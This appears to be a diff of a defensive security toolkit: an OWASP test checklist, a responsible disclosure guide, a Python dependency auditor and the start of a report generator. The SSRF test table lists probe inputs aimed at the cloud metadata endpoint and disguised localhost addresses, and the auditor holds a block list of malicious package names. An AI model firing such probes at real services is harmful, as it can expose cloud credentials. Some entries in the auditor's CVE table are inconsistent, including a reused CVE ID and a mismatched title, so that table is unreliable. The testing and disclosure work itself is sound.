| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set |
| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized |
| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages |
| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) |
| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes |
| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion |
### Remediation
1. Implement multi-factor authentication
2. Set session cookies with HttpOnly, Secure, SameSite=Strict
3. Invalidate sessions on logout and password change
4. Use generic error messages ("Invalid credentials" not "User not found")
5. Enforce strong password policy (NIST SP 800-63B)
6. Expire password reset tokens within 15-60 minutes
### CVSS Scoring Guidance
- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
---
## A08:2021 — Software and Data Integrity Failures
**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829
### Description
Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled |
| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present |
| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches |
| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification |
### Remediation
1. Use `yaml.safe_load()` instead of `yaml.load()`
2. Avoid `pickle.loads()` on untrusted data
3. Add SRI hashes to all CDN-loaded scripts
4. Sign all deployment artifacts
5. Protect CI/CD pipeline with branch protection and signed commits
### CVSS Scoring Guidance
- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
---
## A09:2021 — Security Logging and Monitoring Failures
**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778
### Description
Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP |
| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards |
| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated |
| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage |
| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity |
### Remediation
1. Log all authentication events (success and failure)
2. Sanitize logs — strip passwords, tokens, PII before writing
3. Set up alerting on anomalous patterns (SIEM integration)
4. Use append-only log storage (CloudWatch, Splunk, immutable S3)
5. Maintain audit trail for all admin and data-modifying actions
### CVSS Scoring Guidance
Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level.
---
## A10:2021 — Server-Side Request Forgery (SSRF)
**CWEs Covered:** CWE-918
### Description
SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked |
| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked |
| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked |
| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution |
| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked |
| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked |
### Code Patterns to Detect
```python
# BAD: User-controlled URL without validation
url = request.args.get("url")
response = requests.get(url) # SSRF!
# GOOD: URL allowlist validation
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
parsed = urlparse(url)
if parsed.hostname not in ALLOWED_HOSTS:
abort(403, "URL not in allowlist")
response = requests.get(url)
```
### Remediation
1. Validate and allowlist outbound URLs (domain, scheme, port)
2. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x)
3. Block requests to cloud metadata endpoints
4. Use a dedicated egress proxy for outbound requests
5. Disable unnecessary URL-fetching features
6. Resolve DNS and validate the IP address before making the request
### CVSS Scoring Guidance
- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

View File

@@ -0,0 +1,317 @@
# Responsible Disclosure Guide
A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research.
---
## Disclosure Timeline Templates
### Standard 90-Day Disclosure
The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers.
| Day | Action | Owner |
|-----|--------|-------|
| 0 | Discover vulnerability, document with evidence | Researcher |
| 1 | Submit initial report to vendor security contact | Researcher |
| 3 | Confirm report received (if no auto-acknowledgment) | Researcher |
| 7 | Follow up if no acknowledgment received | Researcher |
| 7 | Acknowledge receipt, assign tracking ID | Vendor |
| 14 | Provide initial severity assessment and timeline | Vendor |
| 30 | First status update on remediation progress | Vendor |
| 30 | Request update if none provided | Researcher |
| 60 | Second status update; fix should be in development | Vendor |
| 60 | Offer technical assistance if fix is delayed | Researcher |
| 90 | Public disclosure deadline (with or without fix) | Researcher |
| 90+ | Coordinate joint disclosure statement if fix is ready | Both |
### Accelerated 30-Day Disclosure
For actively exploited vulnerabilities or critical severity (CVSS 9.0+):
| Day | Action |
|-----|--------|
| 0 | Discover, document, report immediately |
| 1 | Vendor acknowledges |
| 7 | Vendor provides remediation timeline |
| 14 | Status update; patch expected |
| 30 | Public disclosure |
### Extended 120-Day Disclosure
For complex vulnerabilities requiring architectural changes:
| Day | Action |
|-----|--------|
| 0 | Report submitted |
| 14 | Vendor acknowledges, confirms complexity |
| 30 | Vendor provides detailed remediation plan |
| 60 | Status update, partial fix may be deployed |
| 90 | Near-complete remediation expected |
| 120 | Full disclosure |
**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time.
---
## Communication Templates
### Initial Vulnerability Report
```
Subject: Security Vulnerability Report — [Brief Title]
To: security@[vendor].com
Dear Security Team,
I am writing to report a security vulnerability I discovered in [Product/Service Name].
## Summary
- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass]
- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X)
- **Affected Component:** [e.g., /api/login endpoint, User Profile page]
- **Discovery Date:** [YYYY-MM-DD]
## Description
[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Evidence
[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.]
## Impact
[What an attacker could achieve by exploiting this vulnerability.]
## Suggested Remediation
[Your recommendation for fixing the issue.]
## Disclosure Timeline
I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline.
## Researcher Information
- Name: [Your Name]
- Organization: [Your Organization, if applicable]
- Contact: [Your Email]
- PGP Key: [Fingerprint or link to public key]
I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation.
Best regards,
[Your Name]
```
### Follow-Up (No Response After 7 Days)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up)
Dear Security Team,
I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title].
I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review?
For reference, my original report is included below / attached.
I remain available to provide additional details or clarification.
Best regards,
[Your Name]
```
### Status Update Request (Day 30)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request)
Dear Security Team,
It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on:
1. Has the vulnerability been confirmed?
2. What is the remediation timeline?
3. Is there anything I can do to assist?
As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE].
Best regards,
[Your Name]
```
### Pre-Disclosure Notification (Day 80)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice)
Dear Security Team,
This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE].
Current status as I understand it: [summarize last known status].
If a fix is not yet available, I recommend:
- Publishing a security advisory acknowledging the issue
- Providing mitigation guidance to affected users
- Communicating a realistic remediation timeline
I am willing to:
- Extend the deadline by [X] days if you can provide a concrete remediation date
- Review the patch before public release
- Coordinate joint disclosure
Please respond by [DATE - 5 days] so we can align on the disclosure approach.
Best regards,
[Your Name]
```
### Public Disclosure Statement
```
# Security Advisory: [Title]
**Reported:** [Date]
**Disclosed:** [Date]
**Vendor:** [Vendor Name]
**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated]
## Summary
[Brief description accessible to non-technical readers.]
## Technical Details
[Full technical description, reproduction steps, evidence.]
## Impact
[What could be exploited and the blast radius.]
## Timeline
| Date | Event |
|------|-------|
| [Date] | Vulnerability discovered |
| [Date] | Report submitted to vendor |
| [Date] | Vendor acknowledged |
| [Date] | Fix released (version X.Y.Z) |
| [Date] | Public disclosure |
## Remediation
[Steps users should take — update to version X, apply config change, etc.]
## Credit
Discovered by [Your Name] ([Organization]).
```
---
## Legal Considerations
### Before You Test
1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization.
2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield.
3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks.
4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data").
### During Testing
1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor.
2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first.
3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not.
4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team.
### During Disclosure
1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally.
2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal.
3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress.
4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details.
---
## Bug Bounty Program Integration
### Finding the Right Program
1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page
2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack
3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary
### Bug Bounty Best Practices
1. **Read the entire policy** before testing — scope, exclusions, safe harbor
2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky
3. **Report one vulnerability per submission** — do not bundle unrelated issues
4. **Provide clear reproduction steps** — assume the reader cannot read your mind
5. **Do not duplicate** — search existing reports before submitting
6. **Be patient** — triage can take days to weeks depending on program volume
7. **Do not publicly disclose** until the program explicitly permits it
### If No Bug Bounty Exists
1. Report directly to `security@[vendor].com`
2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/)
3. Follow the standard disclosure timeline
4. Do not expect payment — responsible disclosure is an ethical practice, not a paid service
---
## CVE Request Process
### When to Request a CVE
- The vulnerability affects publicly available software
- The vendor has confirmed the issue
- A fix is available or will be available soon
### How to Request
1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE
2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/
3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope
### Information Required
```
- Vulnerability type (CWE ID if known)
- Affected product and version range
- Fixed version (if available)
- Attack vector (network, local, physical)
- Impact (confidentiality, integrity, availability)
- CVSS score and vector string
- Description (one paragraph, technical but readable)
- References (advisory URL, patch commit, bug report)
```
### CVE ID Format
```
CVE-YYYY-NNNNN
Example: CVE-2024-12345
```
After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/.
---
## Key Principles Summary
1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public.
2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data.
3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient.
4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process.
5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved.
6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure.
7. **Know the law.** Authorization and scope are your legal foundations. Never test without them.

View File

@@ -0,0 +1,455 @@
#!/usr/bin/env python3
"""
Dependency Auditor - Analyze package manifests for known vulnerable patterns.
Table of Contents:
DependencyAuditor - Main class for dependency vulnerability analysis
__init__ - Initialize with manifest path and severity filter
audit() - Run full audit on the manifest
_parse_manifest() - Detect and parse the manifest file
_parse_package_json() - Parse npm package.json
_parse_requirements() - Parse pip requirements.txt
_parse_go_mod() - Parse Go go.mod
_parse_gemfile() - Parse Ruby Gemfile
_check_vulnerabilities() - Check packages against known CVE patterns
_check_risky_patterns() - Detect risky dependency patterns
main() - CLI entry point
Usage:
python dependency_auditor.py --file package.json
python dependency_auditor.py --file requirements.txt --severity high
python dependency_auditor.py --file go.mod --json
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional, Tuple
@dataclass
class Dependency:
"""Represents a parsed dependency."""
name: str
version: str
ecosystem: str # npm, pypi, go, rubygems
is_dev: bool = False
@dataclass
class VulnerabilityFinding:
"""A known vulnerability match for a dependency."""
package: str
installed_version: str
vulnerable_range: str
cve_id: str
severity: str # critical, high, medium, low
title: str
description: str
remediation: str
cvss_score: float = 0.0
references: List[str] = field(default_factory=list)
@dataclass
class RiskyPattern:
"""A risky dependency pattern (not a CVE, but a concern)."""
package: str
pattern_type: str # pinning, wildcard, deprecated, typosquat
severity: str
description: str
recommendation: str
class DependencyAuditor:
"""Analyze package manifests for known vulnerable patterns and risky dependencies."""
# Known vulnerable package versions (curated subset of high-profile CVEs)
KNOWN_VULNS = [
{"ecosystem": "npm", "package": "lodash", "below": "4.17.21",
"cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2,
"title": "Prototype Pollution in lodash",
"description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.",
"remediation": "Upgrade lodash to >=4.17.21"},
{"ecosystem": "npm", "package": "axios", "below": "1.6.0",
"cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5,
"title": "CSRF token exposure in axios",
"description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.",
"remediation": "Upgrade axios to >=1.6.0"},
{"ecosystem": "npm", "package": "express", "below": "4.19.2",
"cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1,
"title": "Open Redirect in express",
"description": "express before 4.19.2 allows open redirects via malicious URLs.",
"remediation": "Upgrade express to >=4.19.2"},
{"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0",
"cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8,
"title": "Insecure key retrieval in jsonwebtoken",
"description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.",
"remediation": "Upgrade jsonwebtoken to >=9.0.0"},
{"ecosystem": "npm", "package": "minimatch", "below": "3.0.5",
"cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5,
"title": "ReDoS in minimatch",
"description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.",
"remediation": "Upgrade minimatch to >=3.0.5"},
{"ecosystem": "npm", "package": "tar", "below": "6.1.9",
"cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6,
"title": "Arbitrary File Creation in tar",
"description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.",
"remediation": "Upgrade tar to >=6.1.9"},
{"ecosystem": "pypi", "package": "pillow", "below": "9.3.0",
"cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5,
"title": "DoS via crafted image in Pillow",
"description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.",
"remediation": "Upgrade Pillow to >=9.3.0"},
{"ecosystem": "pypi", "package": "django", "below": "4.2.8",
"cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5,
"title": "DoS via file uploads in Django",
"description": "Django before 4.2.8 allows denial of service via large file uploads.",
"remediation": "Upgrade Django to >=4.2.8"},
{"ecosystem": "pypi", "package": "flask", "below": "2.3.2",
"cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5,
"title": "Session cookie exposure in Flask",
"description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.",
"remediation": "Upgrade Flask to >=2.3.2"},
{"ecosystem": "pypi", "package": "requests", "below": "2.31.0",
"cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1,
"title": "Proxy-Authorization header leak in requests",
"description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.",
"remediation": "Upgrade requests to >=2.31.0"},
{"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0",
"cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5,
"title": "NULL dereference in cryptography",
"description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.",
"remediation": "Upgrade cryptography to >=41.0.0"},
{"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1",
"cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8,
"title": "Arbitrary code execution in PyYAML",
"description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().",
"remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"},
{"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0",
"cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9,
"title": "Terrapin SSH prefix truncation attack",
"description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.",
"remediation": "Upgrade golang.org/x/crypto to >=0.17.0"},
{"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0",
"cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
"title": "HTTP/2 rapid reset DoS",
"description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.",
"remediation": "Upgrade golang.org/x/net to >=0.17.0"},
{"ecosystem": "rubygems", "package": "rails", "below": "7.0.8",
"cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
"title": "ReDoS in Rails",
"description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.",
"remediation": "Upgrade rails to >=7.0.8"},
]
# Known typosquat / malicious package names
TYPOSQUAT_PACKAGES = {
"npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss",
"loadsh", "lodashs", "axois", "requets"],
"pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss",
"djago", "flassk", "requets"],
}
def __init__(self, manifest_path: str, severity_filter: str = "low"):
self.manifest_path = Path(manifest_path)
self.severity_filter = severity_filter
self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1}
self.min_severity = self.severity_order.get(severity_filter, 1)
def audit(self) -> Dict:
"""Run full audit on the manifest file."""
deps = self._parse_manifest()
vuln_findings = self._check_vulnerabilities(deps)
risky_patterns = self._check_risky_patterns(deps)
# Filter by severity
vuln_findings = [f for f in vuln_findings
if self.severity_order.get(f.severity, 0) >= self.min_severity]
risky_patterns = [r for r in risky_patterns
if self.severity_order.get(r.severity, 0) >= self.min_severity]
return {
"manifest": str(self.manifest_path),
"ecosystem": deps[0].ecosystem if deps else "unknown",
"total_dependencies": len(deps),
"dev_dependencies": len([d for d in deps if d.is_dev]),
"vulnerability_findings": vuln_findings,
"risky_patterns": risky_patterns,
"summary": {
"critical": len([f for f in vuln_findings if f.severity == "critical"]),
"high": len([f for f in vuln_findings if f.severity == "high"]),
"medium": len([f for f in vuln_findings if f.severity == "medium"]),
"low": len([f for f in vuln_findings if f.severity == "low"]),
"risky_patterns_count": len(risky_patterns),
}
}
def _parse_manifest(self) -> List[Dependency]:
"""Detect manifest type and parse dependencies."""
name = self.manifest_path.name.lower()
try:
content = self.manifest_path.read_text(encoding="utf-8")
except (OSError, PermissionError) as e:
print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr)
sys.exit(1)
if name == "package.json":
return self._parse_package_json(content)
elif name in ("requirements.txt", "requirements-dev.txt", "requirements_dev.txt"):
return self._parse_requirements(content)
elif name == "go.mod":
return self._parse_go_mod(content)
elif name in ("gemfile", "gemfile.lock"):
return self._parse_gemfile(content)
else:
print(f"Unsupported manifest type: {name}", file=sys.stderr)
print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr)
sys.exit(1)
def _parse_package_json(self, content: str) -> List[Dependency]:
"""Parse npm package.json."""
deps = []
try:
data = json.loads(content)
except json.JSONDecodeError as e:
print(f"Invalid JSON in package.json: {e}", file=sys.stderr)
sys.exit(1)
for name, version in data.get("dependencies", {}).items():
clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=False))
for name, version in data.get("devDependencies", {}).items():
clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=True))
return deps
def _parse_requirements(self, content: str) -> List[Dependency]:
"""Parse pip requirements.txt."""
deps = []
for line in content.strip().split("\n"):
line = line.strip()
if not line or line.startswith("#") or line.startswith("-"):
continue
match = re.match(r"^([a-zA-Z0-9_.-]+)\s*(?:[=<>!~]+\s*)?([\d.]*)", line)
if match:
name, version = match.group(1), match.group(2) or "unknown"
deps.append(Dependency(name=name.lower(), version=version, ecosystem="pypi"))
return deps
def _parse_go_mod(self, content: str) -> List[Dependency]:
"""Parse Go go.mod."""
deps = []
in_require = False
for line in content.strip().split("\n"):
line = line.strip()
if line.startswith("require ("):
in_require = True
continue
if line == ")":
in_require = False
continue
if in_require or line.startswith("require "):
cleaned = line.replace("require ", "").strip()
parts = cleaned.split()
if len(parts) >= 2:
name = parts[0]
version = parts[1].lstrip("v")
indirect = "// indirect" in line
deps.append(Dependency(name=name, version=version, ecosystem="go", is_dev=indirect))
return deps
def _parse_gemfile(self, content: str) -> List[Dependency]:
"""Parse Ruby Gemfile."""
deps = []
for line in content.strip().split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
match = re.match(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"'])?''', line)
if match:
name = match.group(1)
version = match.group(2) or "unknown"
version = re.sub(r"[~><=\s]", "", version)
deps.append(Dependency(name=name, version=version, ecosystem="rubygems"))
return deps
@staticmethod
def _version_below(installed: str, threshold: str) -> bool:
"""Check if installed version is below threshold (simple numeric comparison)."""
try:
inst_parts = [int(x) for x in installed.split(".") if x.isdigit()]
thresh_parts = [int(x) for x in threshold.split(".") if x.isdigit()]
# Pad shorter list
max_len = max(len(inst_parts), len(thresh_parts))
inst_parts.extend([0] * (max_len - len(inst_parts)))
thresh_parts.extend([0] * (max_len - len(thresh_parts)))
return inst_parts < thresh_parts
except (ValueError, IndexError):
return False
def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]:
"""Check dependencies against known CVE database."""
findings = []
for dep in deps:
for vuln in self.KNOWN_VULNS:
if (dep.ecosystem == vuln["ecosystem"] and
dep.name.lower() == vuln["package"].lower() and
self._version_below(dep.version, vuln["below"])):
findings.append(VulnerabilityFinding(
package=dep.name,
installed_version=dep.version,
vulnerable_range=f"< {vuln['below']}",
cve_id=vuln["cve"],
severity=vuln["severity"],
title=vuln["title"],
description=vuln["description"],
remediation=vuln["remediation"],
cvss_score=vuln.get("cvss", 0.0),
references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"],
))
return findings
def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]:
"""Detect risky dependency patterns."""
patterns = []
ecosystem = deps[0].ecosystem if deps else "unknown"
# Check for typosquat packages
typosquats = self.TYPOSQUAT_PACKAGES.get(ecosystem, [])
for dep in deps:
if dep.name.lower() in [t.lower() for t in typosquats]:
patterns.append(RiskyPattern(
package=dep.name,
pattern_type="typosquat",
severity="critical",
description=f"'{dep.name}' is a known typosquat or malicious package name.",
recommendation="Remove immediately and check for compromised data. Install the legitimate package.",
))
# Check for wildcard/unpinned versions
for dep in deps:
if dep.version in ("*", "latest", "unknown", ""):
patterns.append(RiskyPattern(
package=dep.name,
pattern_type="unpinned",
severity="medium",
description=f"'{dep.name}' has an unpinned version ({dep.version}).",
recommendation="Pin to a specific version to prevent supply chain attacks.",
))
# Check for excessive dev dependencies in production
dev_count = len([d for d in deps if d.is_dev])
total = len(deps)
if total > 0 and dev_count / total > 0.7:
patterns.append(RiskyPattern(
package="(project-level)",
pattern_type="dev-heavy",
severity="low",
description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.",
recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.",
))
return patterns
def format_report_text(result: Dict) -> str:
"""Format audit result as human-readable text."""
lines = []
lines.append("=" * 70)
lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT")
lines.append(f"Manifest: {result['manifest']}")
lines.append(f"Ecosystem: {result['ecosystem']}")
lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)")
lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
lines.append("=" * 70)
summary = result["summary"]
lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, "
f"{summary['medium']} medium, {summary['low']} low, "
f"{summary['risky_patterns_count']} risky pattern(s)")
vulns = result["vulnerability_findings"]
if vulns:
lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n")
for v in vulns:
lines.append(f" [{v.severity.upper()}] {v.package} {v.installed_version}")
lines.append(f" CVE: {v.cve_id} (CVSS: {v.cvss_score})")
lines.append(f" {v.title}")
lines.append(f" Vulnerable: {v.vulnerable_range}")
lines.append(f" Fix: {v.remediation}")
lines.append("")
else:
lines.append("\nNo known vulnerabilities found in dependencies.")
risky = result["risky_patterns"]
if risky:
lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n")
for r in risky:
lines.append(f" [{r.severity.upper()}] {r.package}{r.pattern_type}")
lines.append(f" {r.description}")
lines.append(f" Fix: {r.recommendation}")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Supported manifests:
package.json (npm)
requirements.txt (pip/PyPI)
go.mod (Go)
Gemfile (Ruby)
Examples:
%(prog)s --file package.json
%(prog)s --file requirements.txt --severity high
%(prog)s --file go.mod --json
""",
)
parser.add_argument("--file", required=True, metavar="PATH",
help="Path to package manifest file")
parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low",
help="Minimum severity to report (default: low)")
parser.add_argument("--json", action="store_true", dest="json_output",
help="Output results as JSON")
args = parser.parse_args()
if not Path(args.file).exists():
print(f"Error: File not found: {args.file}", file=sys.stderr)
sys.exit(1)
auditor = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity)
result = auditor.audit()
if args.json_output:
json_result = {
"manifest": result["manifest"],
"ecosystem": result["ecosystem"],
"total_dependencies": result["total_dependencies"],
"dev_dependencies": result["dev_dependencies"],
"summary": result["summary"],
"vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]],
"risky_patterns": [asdict(r) for r in result["risky_patterns"]],
"generated_at": datetime.now().isoformat(),
}
print(json.dumps(json_result, indent=2))
else:
print(format_report_text(result))
# Exit non-zero if critical or high vulnerabilities found
if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0:
sys.exit(1)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,462 @@
#!/usr/bin/env python3
"""
Pen Test Report Generator - Generate structured penetration testing reports from findings.
Table of Contents:
PentestReportGenerator - Main class for report generation
__init__ - Initialize with findings data
generate_markdown() - Generate markdown report
generate_json() - Generate structured JSON report
_executive_summary() - Build executive summary section
_findings_table() - Build severity-sorted findings table
_detailed_findings() - Build detailed findings with evidence
_remediation_matrix() - Build effort vs. impact remediation matrix
_calculate_risk_score() - Calculate overall risk score
main() - CLI entry point
Usage:
python pentest_report_generator.py --findings findings.json --format md --output report.md
python pentest_report_generator.py --findings findings.json --format json
python pentest_report_generator.py --findings findings.json --format md
"""
import argparse
import json
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
@dataclass
class Finding:
"""A single pen test finding."""
title: str
severity: str # critical, high, medium, low, info
cvss_score: float
category: str
description: str
evidence: str
impact: str
remediation: str
cvss_vector: str = ""
references: List[str] = field(default_factory=list)
